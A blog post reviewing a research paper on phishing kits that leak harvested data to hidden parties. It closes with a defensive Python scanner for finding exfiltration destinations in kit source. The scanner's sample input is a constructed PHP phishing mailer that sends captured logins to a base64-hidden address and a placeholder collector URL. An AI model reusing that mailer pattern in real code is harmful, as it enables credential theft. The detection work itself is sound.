Sunday, August 18, 2024

[Rephrasing] Leaky Kits: The Increased Risk of Data Exposure from Phishing Kits

💡 This is a reader's perspective on the paper by Bhaskar Tejaswi (Concordia University), published at the APWG Symposium on Electronic Crime Research 2022.

Brief Description

The paper offers a nice review of phishing kits and of how they can be exploited to leak the information they collect. The tools the authors use are summarized in their open-source repository. While they obtain a lot of information from the phishing kits they analyzed, their focus is on the attackers who buy a phishing kit without inspecting its source code, and who therefore fail to spot backdoors and leaked information.

Observations

The paper points out some interesting related work on the "identification and collection of phishing kits", which may suggest alternative ways of clustering phishing kits by fingerprint. That is still a nice research gap.

One nice thing is the idea of clustering phishing kits based on the leaked information they gathered. While the clustering is very primitive, it is a nice way to see the different variations of a phishing kit.

Initial Questions

The first thing I asked myself was how they acquired such a large dataset of phishing kits, since it is an interesting research topic. In the end, they explain that they used PhishFinder, a common technique for finding phishing kits from hosted phishing pages.

Where do the experiment ideas come from?

The whole paper is built on the idea of analyzing leaked information from phishing kits, from the phishing kit collection system through to the experiments on the collected kits.

What are the interesting ideas/results?

I like the dynamic analysis tool they developed to run the phishing kit without having to host it.

They also use a nice tool, PhishFinder, to discover phishing kits using URLs from open repositories.

PDSCAN is a nice tool for discovering sensitive information in files.

Whispers is a nice tool that finds interesting information in the source code of phishing kits.

One awesome experiment they thought of was joining the Telegram group to see the information that was sent there. That was indeed a very nice finding, and it gives a measure of the size of the problem (HUGE).
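As an added example (my own code, not the paper's tooling and not PDSCAN or Whispers), here is a small Python scanner that illustrates the kind of check those tools automate: it lists every e-mail address and URL found in a kit's source, including ones hidden in base64 literals, so the destinations the kit operator configured can be compared with the ones actually present. The PHP snippet and all addresses in it are constructed placeholders.

```python
import base64
import binascii
import re

# Constructed sample of a phishing-kit mailer script (placeholder, not real kit code).
# The visible recipient is the buyer's address; a second recipient is hidden in a
# base64 literal and a third destination is a URL, the pattern the paper describes.
SAMPLE_KIT_SOURCE = r'''<?php
$recipient = "buyer@example.com";
$hidden = base64_decode("YXV0aG9yQGV4YW1wbGUubmV0");
mail($recipient, "New login", $message);
mail($hidden, "New login", $message);
$ch = curl_init("https://drop.example.net/collect.php");
'''

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s\"')]+")
# Base64-looking runs of at least 16 characters; shorter runs are mostly noise.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_strings(source):
    """Return the printable ASCII decodes of base64-looking literals in source."""
    decoded = []
    for match in B64_RE.finditer(source):
        token = match.group(0)
        if len(token) % 4 != 0:          # valid base64 is padded to a multiple of 4
            continue
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue                      # random bytes or an identifier, not a string
        if text.isprintable():
            decoded.append(text)
    return decoded


def find_exfil_destinations(source):
    """Collect e-mail addresses and URLs from plaintext and from decoded base64."""
    texts = [source] + decode_base64_strings(source)
    emails, urls = set(), set()
    for text in texts:
        emails.update(EMAIL_RE.findall(text))
        urls.update(URL_RE.findall(text))
    return {"emails": sorted(emails), "urls": sorted(urls)}


def unexpected_destinations(source, declared):
    """Destinations present in the kit other than the ones the operator configured."""
    found = find_exfil_destinations(source)
    return sorted(d for d in found["emails"] + found["urls"] if d not in set(declared))
```

Running `unexpected_destinations(SAMPLE_KIT_SOURCE, ["buyer@example.com"])` surfaces the hidden address and the collector URL that a buyer who never reads the source would miss.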
